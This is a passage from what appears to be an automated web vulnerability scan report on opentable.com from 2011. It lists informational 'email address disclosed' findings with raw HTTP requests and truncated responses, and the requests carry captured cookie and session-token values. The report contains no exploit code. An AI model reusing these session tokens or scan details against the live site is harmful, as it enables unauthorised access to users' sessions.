User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Content-Length: 105
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:10:40 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:03 GMT

GIF89a.......................................................!.....
.,...........PI9...%)L.....6*...j...;
20.209. http://www.opentable.com/info/restaurateurs/img/restjoinus/contactcorner_upperright.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /info/restaurateurs/img/restjoinus/contactcorner_upperright.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /info/restaurateurs/img/restjoinus/contactcorner_upperright.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Content-Length: 104
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:10:38 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:04 GMT

GIF89a.......................................................!.......,...........p...!T.T.....Z....*F..;
20.210. http://www.opentable.com/info/restaurateurs/img/restjoinus/overview.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /info/restaurateurs/img/restjoinus/overview.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /info/restaurateurs/img/restjoinus/overview.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Content-Length: 18828
Content-Type: image/jpeg
Last-Modified: Fri, 23 Sep 2011 02:10:38 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:02 GMT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

...............................................................................................................
...[SNIP]...
20.211. http://www.opentable.com/info/restaurateurs/img/restjoinus/whitedots_278.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /info/restaurateurs/img/restjoinus/whitedots_278.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /info/restaurateurs/img/restjoinus/whitedots_278.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Content-Length: 236
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:10:40 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:02 GMT

GIF89a.......................................................................................................!.......,..........i.".d)Z.....$
"..Q.....`.......l8.....^.Y....~...(EV.X'1z.*.M..8MZ..!..=
...[SNIP]...
20.212. http://www.opentable.com/interim.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /interim.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; pgseq=; ftc=x=10%2f03%2f2011+15%3a54%3a43&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=0

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:44 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-04
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=0&hr=http://www.grandcafe-sf.com/&tp=136; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Vary: Accept-Encoding
Content-Length: 5566


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head><meta http-equiv="content-type" content="text/html; chars
...[SNIP]...
20.213. http://www.opentable.com/irp/jquery/js/ScriptHandler.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /irp/jquery/js/ScriptHandler.ashx

Issue detail

The following email address was disclosed in the response:

Request

GET /irp/jquery/js/ScriptHandler.ashx?f=jquery&z=true HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=2592000
Content-Length: 71803
Content-Type: application/javascript; charset=utf-8
Expires: Wed, 02 Nov 2011 12:55:09 GMT
Last-Modified: Fri, 23 Sep 2011 02:14:12 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Date: Mon, 03 Oct 2011 12:55:09 GMT

(function(A,w){function ma(){if(!c.isReady){try{s.documentElement.doScroll("left")}catch(a){setTimeout(ma,1);return}c.ready()}}function Qa(a,b){b.src?c.ajax({url:b.src,async:false,dataType:"script"}):
...[SNIP]...
20.214. http://www.opentable.com/ism/thickbox.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /ism/thickbox.css

Issue detail

The following email address was disclosed in the response:

Request

GET /ism/thickbox.css HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pgseq=; ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]

Response

HTTP/1.1 200 OK
Content-Length: 2770
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:28 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:53:40 GMT

#TB_window{font:12px Arial,Helvetica,sans-serif;color:#333;z-index:99999999!important;}#TB_secondLine{font:10px Arial,Helvetica,sans-serif;color:#666;}#TB_window a:link{color:#666;}#TB_window a:visite
...[SNIP]...
20.215. http://www.opentable.com/ism/thickbox.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /ism/thickbox.js

Issue detail

The following email address was disclosed in the response:

Request

GET /ism/thickbox.js HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pgseq=; ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]

Response

HTTP/1.1 200 OK
Content-Length: 9452
Content-Type: application/x-javascript
Last-Modified: Fri, 23 Sep 2011 02:14:46 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:53:41 GMT

var tb_pathToImage="";if(document.location.protocol=="https:")tb_pathToImage="https://secure.opentable.com/info/restaurateurs/img/loadingAnimation.gif";else tb_pathToImage="http://www.opentable.com/in
...[SNIP]...
20.216. http://www.opentable.com/jaspers-corner-tap-and-kitchen  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /jaspers-corner-tap-and-kitchen

Issue detail

The following email addresses were disclosed in the response:

Request

GET /jaspers-corner-tap-and-kitchen?rid=200&restref=200 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.kimptonhotels.com/restaurants/restaurant-reservations.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:50 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: restrefwhite=200; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&vbefres=1&vbefreg=1&js=0&m=4&restref=200; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&vbefres=1&vbefreg=1&js=0&m=4&restref=200; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: jslt=DhNUH7QEwV0b0tKkwEp2937edj1JsmX2; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Vary: Accept-Encoding
Content-Length: 199696


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns
...[SNIP]...
<A href=mailto:info@jasperscornertap.com>info@jasperscornertap.com</a>
...[SNIP]...
20.217. http://www.opentable.com/jscripts/ScriptHandler.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /jscripts/ScriptHandler.ashx

Issue detail

The following email address was disclosed in the response:

Request

GET /jscripts/ScriptHandler.ashx?f=jquery&z=true HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pgseq=; ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=2592000
Content-Length: 71803
Content-Type: application/javascript; charset=utf-8
Expires: Wed, 02 Nov 2011 12:53:41 GMT
Last-Modified: Fri, 23 Sep 2011 02:14:12 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Date: Mon, 03 Oct 2011 12:53:40 GMT

(function(A,w){function ma(){if(!c.isReady){try{s.documentElement.doScroll("left")}catch(a){setTimeout(ma,1);return}c.ready()}}function Qa(a,b){b.src?c.ajax({url:b.src,async:false,dataType:"script"}):
...[SNIP]...
20.218. http://www.opentable.com/jscripts/common93.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /jscripts/common93.js

Issue detail

The following email address was disclosed in the response:

Request

GET /jscripts/common93.js?v=Web_11_10_0_11.prod.com HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 5727
Content-Type: application/x-javascript
Last-Modified: Fri, 23 Sep 2011 02:14:00 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:52 GMT

window.onerror=null;function swap(imgname,imgB){document[imgname].src=imgB}function printPage(){if(window.print)window.print()}function setCookie(name,value){var curCookie=name+" = "+escape(value);doc
...[SNIP]...
20.219. http://www.opentable.com/jscripts/homepage.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /jscripts/homepage.js

Issue detail

The following email address was disclosed in the response:

Request

GET /jscripts/homepage.js?v=Web_11_10_0_11.prod.com HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; lvCKE=tr=0&ts=0&g=06111003070951059795&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; s_cc=true; s_nr=1317651710801-Repeat; s_sq=%5B%5BB%5D%5D; ftc=x=10%2f03%2f2011+17%3a21%3a29&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=100; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=qX3x6OJGnKP0oN40NSfL%2bw%3d%3d&ts=1&st=5&js=1; em=0; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 5463
Content-Type: application/x-javascript
Last-Modified: Fri, 23 Sep 2011 02:14:06 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
